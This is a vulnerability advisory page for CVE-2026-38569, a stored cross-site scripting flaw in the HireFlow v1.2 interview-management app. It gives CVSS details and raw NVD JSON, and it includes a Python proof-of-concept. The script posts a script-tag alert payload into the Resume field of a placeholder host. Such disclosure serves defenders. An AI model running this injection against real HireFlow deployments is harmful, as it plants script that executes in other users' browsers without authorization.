Security Vulnerability Report
中文
CVE-2026-38569 CVSS 5.4 MEDIUM

CVE-2026-38569

Published: 2026-05-11 18:16:33
Last Modified: 2026-05-11 19:16:22

Description

HireFlow v1.2 is vulnerable to Cross Site Scripting (XSS) in candidate_detail.html via the Resume or Feedback Comment fields via POST /candidates/add or POST /feedback/add.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HireFlow v1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL configuration target_url = "http://target-host/candidates/add" # Malicious payload to demonstrate XSS # This payload triggers a simple alert box when the page is loaded xss_payload = "<script>alert('CVE-2026-38569-XSS');</script>" # Data to be sent in the POST request # The vulnerability is in the 'Resume' or 'Feedback Comment' fields post_data = { "name": "Test Candidate", "email": "[email protected]", "resume": xss_payload, # Injecting payload into the Resume field "feedback_comment": "Nice resume" # Or inject here } try: # Sending the POST request to store the malicious payload response = requests.post(target_url, data=post_data) if response.status_code == 200: print("Payload sent successfully. Check candidate_detail.html to verify execution.") else: print(f"Request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38569", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:33.087", "lastModified": "2026-05-11T19:16:22.167", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "HireFlow v1.2 is vulnerable to Cross Site Scripting (XSS) in candidate_detail.html via the Resume or Feedback Comment fields via POST /candidates/add or POST /feedback/add."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/StratonWebDesigners/HireFlow", "source": "[email protected]"}, {"url": "https://github.com/hijackedamygdala/CVE-Disclosures/tree/main/HireFlow/CVE-2026-38569", "source": "[email protected]"}, {"url": "https://www.sourcecodester.com/python/18688/hireflow-%E2%80%93-complete-interview-management-system.html", "source": "[email protected]"}]}}